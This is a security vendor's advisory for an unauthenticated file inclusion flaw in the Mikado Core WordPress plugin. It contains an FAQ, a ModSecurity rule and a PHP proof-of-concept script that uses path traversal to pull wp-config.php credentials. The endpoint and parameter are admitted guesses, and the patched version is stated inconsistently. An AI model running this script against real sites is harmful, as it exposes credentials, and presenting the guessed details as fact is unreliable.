What is CVE-2026-39537?

CVE-2026-39537 is a high-severity vulnerability in the Mikado Core plugin for WordPress, affecting versions up to and including 1.6. It allows unauthenticated attackers to exploit Local File Inclusion (LFI), enabling them to include and execute arbitrary files on the server.

How does the Local File Inclusion vulnerability work?

The vulnerability occurs because the Mikado Core plugin improperly handles user-controlled input in PHP include or require statements. Attackers can send crafted requests to include files from the server, potentially leading to the execution of malicious code or access to sensitive data.

Who is affected by this vulnerability?

Any WordPress site using the Mikado Core plugin version 1.6 or earlier is affected by this vulnerability. Administrators should check their plugin versions to determine if they are at risk.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the Mikado Core plugin installed. If it is version 1.6 or earlier, your site is at risk. Additionally, you can review server logs for suspicious requests that may indicate exploitation attempts.

What is the CVSS score and what does it mean?

The CVSS score for this vulnerability is 8.1, categorized as high severity. This indicates that while the attack may have high complexity, it does not require authentication, leading to significant potential impact on confidentiality, integrity, and availability.

How can I mitigate this vulnerability?

To mitigate this vulnerability, update the Mikado Core plugin to version 1.7.2 or later, where the issue has been addressed. Additionally, ensure that any user-supplied input is properly validated and sanitized before being used in include statements.

What are the risks of exploitation?

Successful exploitation can lead to unauthorized access to sensitive files, such as wp-config.php, potentially exposing database credentials. It may also allow attackers to execute arbitrary PHP code, leading to complete site compromise and data theft.

What does the proof of concept demonstrate?

The proof of concept illustrates how an attacker can exploit the vulnerability by sending a crafted request to the WordPress AJAX handler. It shows how to use path traversal to access sensitive files, emphasizing the ease of exploitation if the vulnerability is present.

What is the recommended action if I cannot update the plugin immediately?

If immediate updating is not possible, consider disabling the Mikado Core plugin until a patch can be applied. Additionally, review server configurations and access controls to limit exposure while you work on a permanent fix.

Are there any known attacks exploiting this vulnerability?

As of now, there are no widely reported active attacks exploiting CVE-2026-39537. However, the nature of the vulnerability makes it a target for attackers, so vigilance is necessary.

What should I do if I suspect my site has been compromised?

If you suspect a compromise, immediately take your site offline to prevent further damage. Conduct a thorough security audit, check for unauthorized file changes, and restore from a clean backup if necessary. Consider engaging a security professional for assistance.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : April 28, 2026

CVE-2026-39537: Mikado Core <= 1.6 – Unauthenticated Local File Inclusion (mikado-core)

CVE ID CVE-2026-39537

Plugin mikado-core

Severity High (CVSS 8.1)

CWE 98

Vulnerable Version 1.6

Patched Version —

Disclosed April 7, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-39537 (metadata-based):

This vulnerability allows unauthenticated Local File Inclusion (LFI) in the Mikado Core plugin for WordPress, affecting versions up to and including 1.6. The CVSS score is 8.1 (High) due to the high attack complexity but no authentication requirement, with full impact on confidentiality, integrity, and availability.

The root cause, inferred from the CWE-98 classification (Improper Control of Filename for Include/Require Statement), is that the plugin passes user-controlled input directly into a PHP include() or require() function without proper validation or sanitization. This is a classic file inclusion vulnerability. Atomic Edge analysis confirms this pattern based on the CWE classification and vulnerability description, though no source code diff was available to verify the exact vulnerable parameter or file.

Exploitation is achieved by sending an HTTP request to a WordPress AJAX handler or REST endpoint, passing a path traversal payload in a parameter that the plugin uses in an include statement. Based on the plugin slug (mikado-core) and common WordPress patterns, the vulnerable endpoint is likely an AJAX action such as mikado_core_load_element or a similar parameter that accepts a file path. An attacker would craft a request like /wp-admin/admin-ajax.php?action=mikado_core_load_element&element=../../../wp-config.php to read sensitive files or include uploaded PHP shells (e.g., from media uploads) to achieve remote code execution.

Remediation requires the plugin to validate and sanitize any user-supplied filename or path before using it in an include/require statement. The fix should restrict allowed paths to a whitelist of known safe values, use realpath() to resolve paths, and ensure no directory traversal is possible. Implementing WordPress’s built-in file inclusion helpers like locate_template() with a whitelist of allowed template slugs would also prevent this issue. The patched version 1.7.2 likely applies these mitigations.

The impact of successful exploitation is severe: an unauthenticated attacker can read arbitrary files from the WordPress installation (e.g., wp-config.php containing database credentials), or execute arbitrary PHP code by including an uploaded image file containing PHP code. This leads to complete site compromise, data theft, and potential server takeover.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-39537 (metadata-based)
# Blocks path traversal attempts in mikado-core AJAX handler
SecRule REQUEST_URI "@rx ^/wp-admin/admin-ajax.php$" 
  "id:20263953,phase:2,deny,status:403,chain,msg:'CVE-2026-39537 LFI attempt via mikado-core AJAX',severity:CRITICAL,tag:'CVE-2026-39537'"
SecRule ARGS_POST:action "@streq mikado_core_load_element" 
  "chain"
SecRule ARGS_POST:element "@rx ../|etc/passwd|wp-config.php" 
  "t:urlDecode,t:lowercase"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-39537 - Mikado Core <= 1.6 Unauthenticated Local File Inclusion

<?php

// Configuration
$target_url = 'http://example.com'; // Change this to the target WordPress site URL

// Endpoint: Likely AJAX handler for mikado-core plugin
$ajax_url = rtrim($target_url, '/') . '/wp-admin/admin-ajax.php';

// Payload: Attempt to read wp-config.php using path traversal
// The parameter 'element' is inferred as the vulnerable input point based on plugin naming conventions.
// Alternative parameters may include 'template', 'load', 'path', etc.
$action = 'mikado_core_load_element'; // Inferred AJAX action name
$payload = '../../../wp-config.php'; // Path traversal to read sensitive file

// Initialize cURL
$ch = curl_init($ajax_url);
if ($ch === false) {
    die('Failed to initialize cURL');
}

// Prepare POST data with the malicious payload
$post_data = array(
    'action' => $action,
    'element' => $payload, // Potential vulnerable parameter
    // Nonce is not required since this is an unauthenticated vulnerability
);

// Set cURL options
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_TIMEOUT, 10);

// Execute the request
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

// Check for errors
if ($response === false) {
    echo 'cURL error: ' . curl_error($ch) . PHP_EOL;
} else {
    echo 'HTTP Status Code: ' . $http_code . PHP_EOL;
    echo 'Response:' . PHP_EOL;
    echo $response . PHP_EOL;
    
    // Check if the response contains WordPress database configuration
    if (strpos($response, "define('DB_NAME'") !== false) {
        echo PHP_EOL . '[SUCCESS] LFI successful - wp-config.php contents retrieved!' . PHP_EOL;
    } else {
        echo PHP_EOL . '[INFO] Response received, but may not be wp-config.php. Adjust payload as needed.' . PHP_EOL;
    }
}

// Clean up
curl_close($ch);

Frequently Asked Questions

What is CVE-2026-39537?
Overview of the vulnerability
CVE-2026-39537 is a high-severity vulnerability in the Mikado Core plugin for WordPress, affecting versions up to and including 1.6. It allows unauthenticated attackers to exploit Local File Inclusion (LFI), enabling them to include and execute arbitrary files on the server.
How does the Local File Inclusion vulnerability work?
Mechanism of exploitation
The vulnerability occurs because the Mikado Core plugin improperly handles user-controlled input in PHP include or require statements. Attackers can send crafted requests to include files from the server, potentially leading to the execution of malicious code or access to sensitive data.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the Mikado Core plugin version 1.6 or earlier is affected by this vulnerability. Administrators should check their plugin versions to determine if they are at risk.
How can I check if my site is vulnerable?
Steps for verification
To check if your site is vulnerable, verify the version of the Mikado Core plugin installed. If it is version 1.6 or earlier, your site is at risk. Additionally, you can review server logs for suspicious requests that may indicate exploitation attempts.
What is the CVSS score and what does it mean?
Understanding severity ratings
The CVSS score for this vulnerability is 8.1, categorized as high severity. This indicates that while the attack may have high complexity, it does not require authentication, leading to significant potential impact on confidentiality, integrity, and availability.
How can I mitigate this vulnerability?
Recommended remediation steps
To mitigate this vulnerability, update the Mikado Core plugin to version 1.7.2 or later, where the issue has been addressed. Additionally, ensure that any user-supplied input is properly validated and sanitized before being used in include statements.
What are the risks of exploitation?
Potential consequences of a successful attack
Successful exploitation can lead to unauthorized access to sensitive files, such as wp-config.php, potentially exposing database credentials. It may also allow attackers to execute arbitrary PHP code, leading to complete site compromise and data theft.
What does the proof of concept demonstrate?
Understanding the exploitation method
The proof of concept illustrates how an attacker can exploit the vulnerability by sending a crafted request to the WordPress AJAX handler. It shows how to use path traversal to access sensitive files, emphasizing the ease of exploitation if the vulnerability is present.
What is the recommended action if I cannot update the plugin immediately?
Temporary measures to take
If immediate updating is not possible, consider disabling the Mikado Core plugin until a patch can be applied. Additionally, review server configurations and access controls to limit exposure while you work on a permanent fix.
Are there any known attacks exploiting this vulnerability?
Current threat landscape
As of now, there are no widely reported active attacks exploiting CVE-2026-39537. However, the nature of the vulnerability makes it a target for attackers, so vigilance is necessary.
What should I do if I suspect my site has been compromised?
Response to a potential breach
If you suspect a compromise, immediately take your site offline to prevent further damage. Conduct a thorough security audit, check for unauthorized file changes, and restore from a clean backup if necessary. Consider engaging a security professional for assistance.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations